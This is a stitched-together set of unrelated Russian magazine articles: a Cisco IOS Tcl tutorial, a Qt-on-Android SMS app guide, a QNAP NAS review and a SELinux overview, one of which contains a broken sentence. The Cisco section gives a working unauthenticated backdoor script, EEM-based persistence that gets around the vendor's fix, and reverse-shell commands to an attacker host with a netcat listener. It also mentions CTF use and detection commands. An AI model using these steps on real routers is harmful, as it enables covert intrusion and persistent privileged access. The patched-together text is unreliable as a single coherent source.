Tcl – (Tool Command Language) – скриптовый язык часто применяемых с графической библиотекой Tk, придуман в начале 80-х годов и из-за своей простоты продолжает повсеместно использоваться как встроенный в различные приложения; вспомним хотя бы программы expect или irc-ботов eggdrop, а также использование его как модуля к серверной части apache mod_tcl. В операционную систему IOS, используемую маршрутизаторами Cisco Tcl, был введен с версии IOS 12.3(2)T, что позволило реализовать в маршрутизаторах Cisco Systems функции выполнения «пользовательских» скриптов. Как наиболее часто встречаемый пример, использование IOS IVR для создания интерактивных голосовых меню в системах IP-телефонии.Используя функционал Tcl, мы имеем возможность работать с сокетами, в данном случае открывается некоторая перспектива использования маршрутизатора для следующих действий:

• Разработки собственного варианта «бэкдора» с целью закрепления системы и доступа к ней в обход штатных механизмов защиты;
• Проведения сканирования портов в различных сегментах сети;
• Проброса действующих портов на порт интерфейса, организации обратного (реверсного) доступа к удаленным устройствам;
• Разработки вариантов скриптов для возможности перебора паролей (брутфорса) различных устройств и серверов в сети.

Данными методами также может воспользоваться злоумышленник, получив доступ к TFTP-серверу компании, где размещены существующие скрипты и принудительно заменить существующий сценарий на собственный. В этом случае произойдет его загрузка и запуск на маршрутизаторе.

Практикуемся

Давай попробуем понять, как это можно реализовать с помощью удаленного шелла, который можно использовать без явной аутентификации с входом на назначенный порт по протоколу Telnet. Подобный сценарий использовался в качестве задания на соревнованиях «Рускрипто CTF 2010″.

В первую очередь давай разберем, как работает Tcl на устройствах под управлением IOS.

Загрузка и исполнение TCL-скрипта:

Для первичной загрузки TCL-скриптов необходимо иметь привилегированный доступ не ниже уровня 15 (enable). Скрипт Tcl необходимо загружать удаленно, для этого можно использовать такие протоколы, как TFTP, FTP, RCP, SCP. Загрузку и выполнение скрипта можно выполнять как напрямую в RAM-маршрутизатора, так и в FLASH-память c последующим его запуском с файловой системы IOS.

Загрузка скрипта во FLASH и последующее его выполнение:

Router# copy tftp://192.168.1.4/script.tcl flash://script.tcl
Router# tclsh flash://script.tcl

Загрузка скрипта непосредственно с TFTP-сервера:

Router# tclsh tftp://192.168.1.4/script.tcl

Ниже приведен пример TCL-скрипта, который при запуске захватывает сокет на порт TCP/2002 и связывает его с интерфейсом командной строки (EXEC). Загрузка скрипта выполняется методами, описанными выше (в приведенном примере с сервера TFTP).

proc callback {sock addr port} {
fconfigure $sock -translation crlf -buffering line
puts $sock "Cisco router admin console:"
puts $sock " "
puts -nonewline $sock "Router# "
flush $sock
fileevent $sock readable [list echo $sock]
}

set port 2002
set sh [socket -server callback $port]
vwait var
close $sh

После загрузки и последующего запуска вышеприведенного скрипта появится возможность зайти в систему (режим EXEC) без использования учетных записей и выполнять любые команды с использованием привилегий супер-пользователя (level 15).

[ptsec@maxpatrol ~]$ telnet router 2002
Trying 192.168.1.10...
Connected to router.
Escape character is '^]'.

Router#

Далее я бы хотел рассказать о некоторых ограничениях, которые необходимо помнить при работе с Tcl на устройствах под управлением IOS. В первых версиях IOS, включающих поддержку Tcl, скрипт продолжал свою работу даже при прерывании EXEC-сессии. В новых версиях последовало исправление, которое завершает работу скрипта при обрыве линии или по команде clear line. Этот «патч-фикс» производителя можно обойти несколькими способами:

1. На линиях, (console 0 или vty 0 4), с которых запускается скрипт, применить команду exec-timeout 0 0, в противном случае по завершении сессии скрипт завершит свою работу.

Router>en
Router#conf t
Enter configuration commands, one per line. End with CNTL/Z.
Router(config)#line vty 0 4
Router(config-line)#exec-timeout 0 0

2. Производить запуск скрипта с использованием апплетов EEM (Embedded Event Manager) по триггеру, которым может быть любое действие, в том числе периодический запуск по таймеру. На примере ниже показана конфигурация, которая загружает скрипт с TFTP после запуска маршрутизатора по истечении 20 секунд.

Router(config)# event manager applet BACKDOOR
Router(config-applet)# event timer countdown name Delay time 20
Router(config-applet)# action 1.0 cli command "enable"
Router(config-applet)# action 1.1 cli command "tclsh tftp://192.168.1.4/script.tcl"
Router(config-applet)# action 1.2 syslog msg "Backdoor is executed"

3. Конвертировать TCL-скрипт в формат политик EEM (Embedded Event Manager) и запускать их по триггеру, которым может быть любое действие, в том числе периодический запуск по таймеру.

Готовые утилиты

В ряде ситуаций можно использовать готовые скрипты, такие как IOScat и IOSmap, входящие в IOScat, позволяющие осуществлять проброс портов, прием и передачу файлов путем манипуляций с сокетами. Используя встроенный язык TCL, можно использовать маршрутизатор аналогично ПК с установленным приложением Netcat, предварительно загрузив скрипт TCL в flash-маршрутизатор или через TFTP-сервер напрямую в RAM. Методика загрузки и установки TCL на маршрутизатор описана выше.

Примеры реализации:

Организация бэкдора на маршрутизаторе (2002 порт):

Router# tclsh tftp://192.168.1.4/ioscat.tcl -ip2002 –oe

Организация реверсного шелла на адрес атакующего (порт 12345):

Router# tclsh tftp://192.168.1.4/ioscat.tcl -ie -oa192.168.1.4 -op12345

(на твоей машине приемником шелла выступает обычный netcat: nc -l -p 12345)

Проброс удаленного порта на локальный порт маршрутизатора (2002):

Router# tclsh tftp://192.168.1.4/ioscat.tcl -ip2002 -oa192.168.2.1 -op80

У данного скрипта есть много других примеров, например копирование файлов с использованием сокетов, имитация телнет-сессии на удаленном хосте и много других функций, которые можно посмотреть на сайте разработчика.

Скрипт с названием IOSmap – не что иное, как попытка создать аналог сканера nmap, конечно, в урезанном функционале, но в данном случае достаточно эксклюзивным для работы в среде IOS. Функционал этого TCL-скрипта позволяет производить сканирование диапазонов IP-адресов на открытые TCP/UDP-порты, в том числе используя метод инвентаризации хостов посредством протокола ICMP.

Рассмотрим примеры использования:

Router>en
Router#tclsh tftp://192.168.1.4/iosmap.tcl 192.168.1.1-5 -p20-24,80,443
Loading iosmap.tcl from 192.168.1.4 (via FastEthernet0/0): !
[OK - 15912 bytes]

Router#

Изменение вариантов сканирования скрипта возможно путем добавления аргументов:

-sP – только по ответу хоста;
-sT – TCP-портов методом TCP connect;
-sU – UDP-портов через функционал IP SLA.

Учитывая богатые возможности ТСL, можно разработать множество подобных, интересных приложений для реализации их в сетевой среде на оборудовании Cisco Systems.

Методы обнаружения

Имея возможность запускать скрипты, также интересно иметь возможность отследить их исполнение. Сделать это можно, подсмотрев процессы и состояние портов на маршрутизаторе, используя следующие команды маршрутизатора:

Router#show processes cpu | i Tcl
212 2284 17762 128 3.68% 2.88% 0.67% 162 Tcl Serv - tty16

Router#show tcp brief all
TCB Local Address Foreign Address (state)
659CDABC 192.168.1.10.23 192.168.1.4.5163 ESTAB
654485B4 *.2002 *.* LISTEN
65CA2D04 *.80 *.* LISTEN

Начиная с версии IOS 12.4(4)Т появилась возможность использования CPP (Control Plane Policy):

Router#show control-plane host open-ports
Active internet connections (servers and established)
Prot Local Address Foreign Address Service State
tcp *:23 *:0 Telnet LISTEN
tcp *:23 192.168.1.4:1379 Telnet ESTABLIS
tcp *:80 *:0 HTTP CORE LISTEN
tcp *:1234 *:0 Tcl Serv - tty163 LISTEN

Также можно использовать и автоматизированные средства, такие как система контроля защищенности и соответствия стандартам MaxPatrol (доступен для скачивания на ptsecurity.ru).

Послесловие

Таким образом, все поняли, что любую, даже самую защищенную Cisco можно захватить умело написанным и запущенным TCL-сценарием. В итоге злоумышленник получает шелл со всеми вытекающими отсюда последствиями. А защититься от этого можно только грамотной настройкой маршрутизатора, периодическим обновлением IOS и ежедневным мониторингом логов подключений. В общем, не ленитесь и ухаживайте за своей Cisco .

Спустя некоторое время к нам привалила нежданная радость — для Андроида вышел NDK для нативной разработки на C++, и, конечно же, нашлись люди, которые стали портировать Qt на Android. На данный момент порт уже более-менее юзабелен — работают (и почти не глючат) практически все модули. Ну что ж, посмотрим, какие возможности открывает нам этот порт.

Как оно работает?

Поначалу кажется, что данный порт — это очень большой костыль. Без Java все равно не обошлось — с помощью NDK нельзя создавать исполняемые файлы, можно только библиотеки .so. На Java, по сути, нужно написать всего одну строчку, которая загружает нашу библиотеку на Qt. Далее виртуальная машина Android запускает Java-приложение, которое, в свою очередь, грузит нашу либу.

Сборка QT

Весь процесс очень хорошо описан в Wiki проекта, но он содержит несколько граблей, поэтому кое-какие пояснения нам дать все же придется.

Небольшая оговорка — процесс описывается для Ubuntu 10.04, но на других дистрибутивах, в принципе, все должно происходить так же. А вот для того, чтобы провернуть это дело под виндой, тебе придется немного попрыгать с бубном (какая тонкая ирония, а?).

Итак, поехали:

Создаем директорию для SDK. Пишем в консоль:

wget http://android-lighthouse.googlecode.com/files/qadk-1.x-2.x-rtti-exceptions.tar.lzma
tar xvfa qadk-1.x-2.x-rtti-exceptions.tar.lzma

Клонируем репозиторий Lighthouse:

git clone git://gitorious.org/~taipan/qt/androidlighthouse.git

Редактируем файл mkspecs/android-g++/qmake.conf. В нем нужно изменить NDK_ROOT и ANDROID_PLATFORM (у меня — /data/local/qt и android-5 соответственно). Эти параметры отвечают за расположение собранной библиотеки и ее версию. Также нужно отредактировать файл androidconfig.sh. Настоятельно рекомендую заменить shared на static (для статической сборки библиотеки и приложений). Все, конфигурируем (./androidconfig.sh) и собираем (make -j X, где X — количество ядер твоего процессора).

Все? Не тут-то было! Не знаю, как обстоят дела с другими дистрибутивами, но на Ubuntu «make» вылетал с ошибкой, говорящей о недоступности заголовочных файлов OpenGL. Чего только я не предпринимал… Поставил все, что можно было, но решение оказалось куда проще — надо было просто переустановить имеющиеся в системе заголовочные файлы OpenGL. После этого можно повторять команду make -j X и идти… нет, не пить пиво, а курить мануалы по разработке под Android — информация лишней не бывает никогда, а собираться оно будет долго =).

Создание приложения

Запускай Qt Creator, создавай новое GUI-приложение. В нем (вернее, в файле .pro) нам нужно будет изменить несколько строчек. Они должны выглядеть так:

TEMPLATE = lib
CONFIG += dll

В настройках Qt Creator нужно также указать путь до нашего (андроидовского) qmake — у меня это /data/local/qt/bin/qmake.

Вообще, я бы посоветовал сначала дебажить приложение как десктопное и только потом изменять параметры сборки.

Кстати, я ведь еще не говорил, что за приложение мы будем писать? Это будет приложение для отправки СМС на номера самых различных операторов. Это возможно благодаря сервису smste.ru, который мы и будем использовать. Не буду вдаваться в подробности сниффинга, скажу только, что я использую для этих целей Wireshark.

Разберем алгоритм отправки сообщения:

1. Делаем GET рута — главной страницы сайта, выдираем оттуда нужные нам значения input’ов (те, которые hidden), а заодно и кукисы.
2. Запрашиваем капчу по номеру телефона и показываем ее пользователю.
3. Отправляем POST-запрос с сообщением.

Для отправки HTTP-запросов в Qt существует класс QHttp. Кстати, не забудь подключить модуль QtNetwork (QT += network) в файле проекта!

Набросай форму (мою ты можешь увидеть на скриншоте) и приступай к кодингу.

От объекта http класса QHtpp нам требуются только два сигнала — done() и readyRead(). Сразу при создании главного виджета отправим GET-запрос главной страницы:

http.setHost("smste.ru");
http.get("/");

Сигнал done(), по сути, и не используется — по нему можно будет только опознать ошибку сетевого уровня (например, отключение Wi-Fi). Рассмотрим некоторые части слота onHttpReadyRead(const QHttpResponseHeader&resp):

QString str(http.readAll());
qint32 index=str.indexOf("value=\"code")+7;
if ( index != 6 )
codeMod = str.mid(index, str.indexOf("\" />", index) - index);

Здесь мы копируем «спрятанную» (hidden) переменную codeMod из исходника страницы. Идем дальше:

QString cookieStr;
for ( qint8 i = 0; i < resp.values().count(); i++ )
{
if ( resp.values().at(i).first == "Set-Cookie" ) cookieStr.append(resp.values().at(i).second+'\n');
}
cookies = QNetworkCookie::parseCookies(cookieStr.toAscii());

Ну, а в этом куске кода, как ты, наверное, догадался, мы парсим печеньки. cookies — это QList из QnetworkCookie.

qint32 index = str.indexOf("<image>/pix/") + 12;
image = str.mid(index,str.indexOf(".jpg") - index);
QHttpRequestHeader header = createHeader("GET",QString("/pix/%1.jpg").arg(image));
http.request(header);

Здесь копируется адрес капчи (запрос адреса я покажу чуть позже) и посылается запрос этого самого JPEG’а.

А вот так он сохраняется:

if ( resp.value("Content-Type") == "image/jpeg")
{
ui->captchaLb->setPixmap(QPixmap::fromImage(QImage::fromData(http.readAll())));
return;
}

Так, с этим слотом разобрались.

Капчу нужно запрашивать, как только пользователь введет номер телефона, то есть, когда закончится редактирование текста ui->numberLE. Для этого есть специальный слот:

void MainWidget::on_numberLE_editingFinished()
{
if ( ui->numberLE->text().length() != 11 )
return;
QHttpRequestHeader header = createHeader("GET", QString("/netxml.php?number=%1&rnd=94728").arg(ui->numberLE->text()));
http.request(header);
}

Функцию createHeader() смотри на врезке — она создает хедер HTTP-запроса (вообще, можно и проще, но нам надо отправлять еще и куки).

Создание HTTP-заголовка

QHttpRequestHeader MainWidget::createHeader(
const QString &method,
const QString &path
)
{
QHttpRequestHeader header(method, path);
header.addValue("Host", "smste.ru");
header.addValue("Connection", "keep-alive");
header.addValue("User-Agent", "Mozilla/5.0");
header.addValue("Referer", "http://smste.ru");
header.addValue("Accept", "*/*");
QString cookie;
for ( qint8 i = 0; i < cookies.length(); i++ )
cookie += ( cookies.at(i).toRawForm(QNetworkCookie::NameAndValueOnly) + "; ");
header.addValue("Cookie", cookie);
return header;
}

Остался последний слот — нажатие кнопки «Отправить», и он предельно прост:

QHttpRequestHeader header = createHeader("POST", "/");
header.addValue("", QString("number=%1& message=%2&sign=ax-soft.ru&event=%3& codemod=%4&%5=%6"). arg(ui->numberLE-> text()). arg(ui->textPTE->toPlainText()). arg(image). arg(codeMod). arg(codeMod). arg(ui->captchaLE->text()));
qDebug() << header.toString();
http.request(header);

Вот и все! Делай Build All, собирай .apk-пакет .

Создание виртуальной машины

Для тестирования приложения нам нужно создать виртуальную машину. Кстати, надеюсь, у тебя установлена Java Runtime Environment? Если нет, то поставь, вещь нужная. Кроме того, для создания .apk-пакетов понадобится ant. Ставится он легко — sudo apt-get install ant. Теперь переходи в сабдиректорию tools в Android SDK и вводи ./android. Запустится менеджер настроек и виртуальных машин.

Сначала скачай нужные API (разобраться нетрудно, для этого примера нужна версия 8), далее переходи на вкладку Virtual Devices, жми New. В Name — любое имя, Target — Android 2.2, Skin — какой хочешь (я выбрал WVGA800), и нажимай Create AVD. Затем выбирай машину и жми Start, Launch. Все, будем ждать. На моем нетбуке оно запускалось около десяти минут, на десктопе — 1,5-2 минуты. Работает эмулятор так же медленно, как и запускается (ибо эмулирует ARM с помощью QEMU). С одной стороны это плохо, что все тормозит, а с другой стороны — мы получаем достоверные на 100% результаты. Как только появится рабочий стол Android, виртуальную машину можно будет оставить в покое.

Создание тестового проекта

Переходим в директорию tools Android SDK (в консоли). Открываем документацию, начинаем вкуривать. Вводим: ./android create project. Опс, ошибочка! Смотрим, чего от нас хотят. Ага, мы не указали параметры нашего будущего проекта, а точнее: цель. Нужна версия API, путь до проекта, его имя, имя Activity и имя пространства имен для приложения. У меня получилось вот так:

./android create project --target 8 --name hello --path ./TestPro --activity helloActivity --package com.example.hello

Делаем ls… ага, вот она — директория TestPro. Входим в нее, и опять вызываем ls. Далее в директории libs нужно создать сабдиректорию armeabi. В нее мы копируем нашу собранную Qt’шную либу (.so).

В каталог src/ надо скопировать все содержимое androidlighthouse/src/android/java/com, чтобы получилось src/com/nokia/qt. После этого идем в src/com/example/hello/ и редактируем там главный Activity — helloActivity.java. Удаляем onCreate, добавляем функцию:

public helloActivity()
{
setApplication("Hello");
}

Здесь Hello — имя приложения. Следовательно, наша библиотека .so должна называться libHello.so.

Ну и, наконец, идем в консоли в корень проекта и командуем ant install. Ждем (долго, поскольку либа статическая и весит много. У меня, например — 12.5 Мб). После того, как в консоли появится заветное SUCCESSFUL, можно идти в главное меню Андроида и запускать оттуда свое приложение.

Заключение

Когда-то (то ли в 2007, то ли в 2008) у меня на телефоне (Motorola A1200e, один из первых телефонов с Linux, и, кстати, с гуем, написанным на Qt 2) появилась QTopia, также известная как Qt Embedded — встраиваемая ОС от Trolltech на базе Linux Kernel 2.6 с оболочкой на Qt 4, заброшенная после покупки троллей нокией. Появилась она благодаря труженикам с форума motofan, сумевшим портировать ее на ядро 2.4 (другого у A1200 не было и не будет, поэтому не будет и Андроида). Так вот, когда я ее поставил, был удивлен простотой портирования приложений с десктопа на телефон — иногда требовалось просто пересобрать его кросс-компилятором, и все!

К сожалению, новомодного Qt 4.5 платформа не получила (и зря — на мой взгляд, она была не хуже, чем Maemo). Теперь такой метод портирования возможен и на Android, а ведь за ним будущее. И, кстати, вовсю идет портирование Qt Mobility, классного фреймворка для телефонов Nokia. Жаль, пока что портированием занимается только один, пусть и очень крутой человек (кстати, помочь не желаешь?). В общем, нам осталось дождаться портирования Qt на iOS (там, к сожалению, все далеко не так радужно), и тогда можно будет смело заявлять, что лозунг Qt Software не высосан из пальца.

Qt Everywhere!

Thanks to:

Огромное спасибо румыну taipanromania (автор порта) и marflon (раньше, кстати, писал в ][) за помощь с созданием .apk, ну и, традиционно, группе И-3-1 (Прикладная Математика) МГТУ «Станкин».

Технические характеристики сетевого хранилища QNAP TS-210

• Процессор: Marvell 6281 800 МГц
• Память: 256 Мбайт DDR2 RAM, 16 Мбайт Flash
• Интерфейсы: 1x RJ-45 Gigabit Ethernet, 3x USB 2.0
• HDD-отсек: 2x 3.5” SATA
• Возможности: SMB, NFS, Apple Networking, Telnet/SSH, FTPсервер, Web-сервер (PHP, MySQL), менеджер загрузок (HTTP/FTP/Bit Torrent), UPnP, iTunes Service, Print Server и др.
• Возможности RAID: RAID 0, RAID 1, JBOD
• Габариты, мм: 165x85x218
• Вес, г: 910 (без адаптера питания и жестких дисков)

На рынке имеются самые разнообразные NAS’ы для дома и офиса – с жесткими дисками и без, являющие собой эдакий конструктор. Есть наборчики попроще, а есть напичканные по самую крышечку всяческими функциями. Порой пользователи предпочитают вместо покупки готового хранилища собрать из своего старого железа такой девайс самостоятельно, вот и стараются производители сделать свои устройства максимально привлекательными. В этом обзоре мы посмотрим, чем нас может заинтриговать и соблазнить сетевое хранилище QNAP TS-210.

Описание QNAP TS-210

Первый плюс, который нужно отметить, – это симпатичный внешний вид устройства. Оно выполнено в достаточно компактном и аккуратном белом корпусе. На передней панели, кроме светодиодной индикации и кнопки включения, расположен один USB-порт и кнопка быстрого резервного копирования. Еще два USB-порта находятся на задней панели и могут быть использованы для подключения USB-дисков, флешек и принтеров. Конструкция корпуса, по сравнению с другими моделями, не самая удобная – для установки дисков нужно отвинтить крышку, затем прикрутить винчестеры в стойку, один над другим. Нижний подключается прямо в разъем, установленный на плате, второй с помощью SATA-кабеля.

Для охлаждения накопителей на задней стенке корпуса установлен кулер диаметром 6 см с автоматической регулировкой скорости вращения. Отметим, что TS-210 очень тихий в работе. Для людных офисов в хранилище есть «противоугонная» система – отверстие для замка Kensington. Причем замок блокирует и крышку хранилища, предотвращая кражу не только всего медиасервера, но и отдельных дисков.

По умолчанию девайс настроен на автоматическое получение IP-адреса с DHCP-сервера. Чтобы найти его в сети и перенастроить, нам предлагается воспользоваться программой QNAP Finder. В web-интерфейсе нас сначала встретил мастер первичной настройки – он даже спросил, откуда взять прошивку (прошивка, кстати, универсальная, в том смысле, что содержит сразу несколько языков, включая русский).

После завершения процедуры попадаем на главную страницу меню настроек (если включить встроенный web-сервер, то сначала будет показана краткая инструкция о том, как им пользоваться). Главная страница выглядит весьма эффектно (вовсю применяется технология AJAX) и предлагает нам выбрать нужный раздел, например, «Администрирование» или «Менеджер загрузки» – таким образом, обычному пользователю не придется продираться через дебри настроек к нужной функции. Раздел «Конфигурация» выполнен наглядно и удобно, все настройки хорошо сгруппированы, так что запутаться в них трудно. Приятно, что ссылки на нужные настройки могут быть вынесены на главную страницу.

Диски в TS-210 можно объединить в массивы RAID 0, RAID 1 и JBOD. В разделе управления дисками присутствует закладка S.M.A.R.T. – как понятно из названия, здесь можно просмотреть подробный, но по факту малополезный отчет о физическом состоянии накопителей.

Хранилище поддерживает обширный набор сетевых служб – девайс может работать в сетях Microsoft, Apple, *nix, также возможен доступ по FTP и протоколам Telnet/SSH. Кроме того, присутствует web-менеджер файлов, причем, нужно заметить, реализован он весьма качественно. Еще одна web-программа – Multimedia Station – позволяет пользователям создавать свои мультимедиа-альбомы и просматривать их содержимое в виде слайдшоу.

Одной из самых полезных возможностей медиасерверов является автоматическая закачка файлов из Интернета. Разумеется, наш подопытный тоже умеет это делать – поддерживаются протоколы HTTP, FTP и BitTorrent. В плюс имеющемуся BitTorrent-клиенту стоит записать способность раздавать файлы после скачивания (можно также задать, в течение какого времени он будет это делать). Но есть и недостатки – например, нет возможности выбрать, какие файлы, входящие в торрент, нужно скачивать, а какие нет. Управлять загрузками можно как через web-интерфейс, так и с помощью специальной программы QGet.

Производитель неплохо прокачал функцию бекапа – можно копировать данные с внешнего носителя или на него, а также создавать копии на других сетевые ресурсах. Настроить резервное копирование можно как встроенными в хранилище средствами, так и с помощью программы NetBak Replicator.

Приятной фишкой хранилища стал встроенный web-сервер, причем с уже установленными интерпретатором PHP и базой MySQL – прямо-таки стандартный набор для любого нормального сайта. Отметим, что через web-интерфейс можно устанавливать дополнительные пакеты в формате QPKG (например, Joomla, WordPress и MLDonkey, а в скором времени и RTorrent и Transmittion), с помощью которых можно расширить функциональность встроенного сервера.

Для ограничения доступа к данным, кроме распределения прав доступа по группам пользователей, при желании можно воспользоваться IP-фильтром, разрешив или, наоборот, запретив доступ определенным адресам. В случае возникновения внештатных ситуаций сервер уведомит администратора по электронной почте или SMS.

Для организации медиавещания можно воспользоваться встроенным сервером DLNA/UPnP. С его помощью с TS-210можно транслировать музыку и фильмы на сетевые плееры, подключенные к телевизору. Это могут быть популярные консоли PlayStation 3 и Xbox 360, медиаплееры WD TV Live, QNAP NMP1000 и другие. Никакой предварительной настройки не требуется – сетевой плеер сразу же подцепит DLNA-сервер хранилища QNAP и сможет начать трансляцию.

Что касается работы с периферийными устройствами: кроме внешних накопителей и принтеров, TS-210 умеет взаимодействовать с ИБП и самостоятельно отключаться через заданное время при нарушении питания, а также работать с камерами видеонаблюдения.

Методика тестирования

Богатый функционал это, конечно, здорово, но какую производительность способен показать TS-210? Чтобы это выяснить, мы провели испытания для двух случаев – в первом диски объединялись в массив RAID 0, который, как известно, обеспечивает более высокую скорость доступа к данным, но при этом не обеспечивает дополнительной защиты от издыхания одного диска в массиве. Во втором – в более медленный, но надежный RAID 1. В качестве бенчмарка использовалась программа Intel NAS Perfomance Toolkit 1.7.1, специально разработанная для тестирования производительности сетевых хранилищ. Утилита эмулирует типичные для работы с NAS операции, такие как копирование файлов, проигрывание HD-видео и другие. При тестировании использовалась официальная прошивка версии 3.2.5, устройство подключалось к гигабитной сетевой карте.

Выводы

QNAP TS-210 произвел на нас благоприятное впечатление, поскольку сочетает в себе неплохую производительность, огромное количество полезных функций, симпатичный дизайн и приемлемую цену. Модель вполне можно рекомендовать в качестве домашнего сетевого хранилища и медиасервера. Отметим, что QNAPрегулярно выпускает новые прошивки и утилиты, что позволяет надеяться на дальнейший рост функциональностиTS-210.

Дискреционный и мандатный контроль доступа

Для начала отвлечемся и поразмышляем о том, что есть и зачем нужно еще что-то прикручивать. Одна из задач любой ОС — обеспечить разделение информации, основываясь, в первую очередь, на требованиях конфиденциальности и целостности. Традиционная модель Unix оперирует тремя параметрами — пользователь, группа-пользователь и остальные. Называется она дискреционной (Discretionary Access Control — DAC), то есть добровольной моделью доступа. Пользователь сам определяет права доступа к своим файлам, а выполняющиеся программы имеют те же права, что и запустивший их пользователь. Механизм DAC опирается в своей работе только на тождество пользователя, игнорируя другую информацию, например, о роли пользователя в системе, функции и уровне доверия конкретной программы и необходимости в целостности данных. Каждая учетная запись имеет полную свободу действий в пределах своих полномочий.

Как ты понимаешь, развернуться с DAC особенно негде: все или ничего; винда — и та дает больше возможностей по настройке доступа к объектам. Поэтому сегодня для Linux доступны решения, базирующиеся на совершенно другой модели защиты — MAC (Mandatory Access Control, принудительный контроль доступа). Они позволяют определить политики безопасности над всеми процессами и объектами, решение о доступе принимается на основе большего количества информации об объекте, а не только основываясь на тождестве пользователя. Причем MAC не отменяет, а дополняет DAC, так как сначала проверяются права Unix, и, если они запрещают доступ, то дальнейшая проверка просто не производится. Проверка прав выполняется только в том случае, если стандартные права Unix разрешают доступ к объекту. Любой объект помещается в некую виртуальную песочницу, которая позволяет приложению выполнять только строго регламентированные задачи. Причем при описании доступа к объекту конкретные реализации могут придерживаться разных принципов: очень строгие правила по типу «что не разрешено явно — запрещено» и «минимально необходимые привилегии».

Например, можно настроить систему так, что веб-сервер будет слушать соединения на строго определенном порту, сможет читать файлы только в указанном каталоге и так далее. То есть описать поведение системы в ее нормальном состоянии, создав жесткий каркас, за который нельзя будет выскочить. Это позволяет выполнять программы с правами обычного пользователя, а доступ к необходимым ресурсам указывать при помощи политик.

В дистрибутивах Linux используются два решения: SELinux в RedHat и клонах, а также AppArmor в Ubuntu. В ядре версии 2.6.30 появился код еще одного проекта — TOMOYO Linux, которому пророчат светлое будущее, но пока по умолчанию он нигде не используется. Давай рассмотрим их особенности, а также плюсы и минусы.

Сверхзащищенный SELinux

Проект SELinux (Security Enhanced Linux, selinuxproject.org) зародился в недрах U.S. NSA (National Security Agency), хмурые неразговорчивые дядьки которого поставили своей целью допилить Linux таким образом, чтобы его можно было спокойно использовать не где-нибудь, а в правительственных системах. Анонсирован общественности в 2000 году, затем разработчики справедливо решили: зачем что-то делать самим, если в интернете есть много желающих? В результате сегодня проект развивается под лицензией GNU GPL и уже включен в состав ядра ветки 2.6.х, также выполнена адаптация для FreeBSD и OpenSolaris.

Реализация MAC требует четкого описания правил, что может привести к образованию большого их количества. Поэтому в SELinux использована концепция роль-основанного контроля доступа Role-Based Access Control (RBAC), в которой определяются роли и доступ пользователей. Механизм защиты в SELinux носит название Type Enforcement (TE) и позволяет закрепить за каждым процессом и файлом, которые необходимо контролировать, некую метку. Если процесс, запущенный от имени администратора, скомпрометирован, то ущерб, который может быть причинен системе, ограничен только тем, к чему он может обращаться, согласуясь с установленными для него правилами (а они описывают поведение очень тонко).

Также в SELinux реализована многоуровневая система обеспечения безопасности (MLS, Multi-Level Security model), но ее задействуют только в особых случаях, например, в правительственных многопользовательских системах, требующих чрезвычайно высокого уровня защиты.

Когда в процессе работы системы субъект пытается оказать некое действие на объект, SELinux принимает решение о допустимости указанного действия, основываясь на контекстах безопасности объекта и субъекта. Субъект — это процессы, выполняемые от имени запустившего их пользователя. Объект — элементы файловой системы (файлы, каталоги, ссылки, сокеты и пр.) или другие процессы, над которыми выполняются действия. И теперь самое важное, что отличает SELinux от других решений, описанных далее — все важные защитные атрибуты сохраняются в контекстах безопасности. Поэтому файловая система должна уметь хранить дополнительные атрибуты, и сами атрибуты нужно как-то задать. Современные ядра все обеспечивают, но при самостоятельной пересборке ядра не забудь активировать параметр «Extended attributes» в выбранной файловой системе.

Атрибуты устанавливаются при инициализации системы. Отсюда делаем вывод, что объект уже должен существовать на момент установки атрибутов. Сам атрибут включает идентификатор владельца, роль и тип объекта. Причем идентификатор SELinux (создается командой semanage), хотя и может совпадать в номере с UID пользователя Linux (uid), но это две разные вещи. Не забываем еще об одном важном отличии — SELinux оперирует ролями, поэтому несколько учетных записей Linux могут иметь одну и ту же учетную запись SELinux. И главное — выполнение команды

Проверить это легко:

$ id –Z
user_u:user_t:unconfined_t

Получаем привилегии суперпользователя и проверяем снова:

$ su
# id –Z
user_u:user_t:unconfined_t

Если зайти сразу под рутом, то роль другая:

# id -Z
root:system_r:unconfined_t:SystemLow-SystemHigh

Изменить роль можно при помощи команды newrole. При использовании SELinux штатные команды выводят и контекст. Чтобы  просмотреть контекст файлов и процессов, набираем:

# ls -l –context /
# ps -ax -Z

Кроме того, контекст можно считать прямо из /proc:

# ps aux | grep syslogd
root 2729 0.0 0.0 5908 624 ? Ss 07:30 0:00 syslogd -m 0
# cat /proc/2729/attr/current
system_u:system_r:syslogd_t:s0

Предусмотрена работа SELinux в трех режимах — disable (отключен), enforcing (политики выполняются, все, что не соответствует — блокируется), permissive (политики анализируются, все нарушения заносятся в журнал «avc: denied», но блокировки не производятся). Узнать текущий режим просто, как, впрочем, и некоторые другие настройки, достаточно прочитать данные из псевдофайловой системы /selinux:

$ cat /selinux/enforce

Если получим 1, значит, SELinux активирован. Чтобы изменить режим работы на лету, просто записываем в этот файл 0 или 1:

# echo 0 > /selinux/enforce

Также можно воспользоваться утилитой «setenforce [ Enforcing | Permissive | 1 | 0 ]«.

Собственно настройки производятся в конфигурационных файлах, размещенных в каталоге /etc. В дистрибутивах, базирующихся на RedHat, доступен графический SELinux Administration Tool (system-configselinux, пакет policycoreutils-gui). Так, режим работы устанавливается в файле /etc/sysconfig/selinux (на самом деле это ссылка на /etc/selinux/config). В частности, режим работы определяет параметр SELINUX:

SELINUX=enforcing|permissive|disabled

По умолчанию в большинстве дистрибутивов SELinux защищает не все демоны, а только строго определенные: dhcpd, httpd, named, nscd, ntpd, portmap, snmpd, squid и syslogd. Для остальных политика не определена — unconfined_t. Чтобы защитить всю систему, необходимо изменить значение SELINUXTYPE на strict:

SELINUXTYPE=targeted|strict

В каталоге /etc/selinux/targeted/contexts находим описание контекстов.

Например, для root контекст описывается так:

# cat /etc/selinux/targeted/contexts/users/root
system_r:unconfined_t:s0 system_r:unconfined_t:s0
system_r:initrc_t:s0 system_r:unconfined_t:s0

Чтобы просмотреть все контексты, связанные с httpd, введи такую команду:

# grep -iR httpd /etc/selinux/targeted/contexts

Ты увидишь, что для разных ситуаций контекст будет отличаться. Теперь получим список всех параметров SELinux: «getsebool -a». Для установки используй команду setsebool (с ключом ‘-P’ для сохранения значения после перезагрузки) или графическую утилиту system-configsecuritylevel. Вывод «sestatus -v» покажет все текущие установки. Не забываем и о журналах:

# dmesg | grep -i selinux
SELinux: Initializing.
SELinux: Starting in permissive mode
# grep -iR selinux /var/log/messages

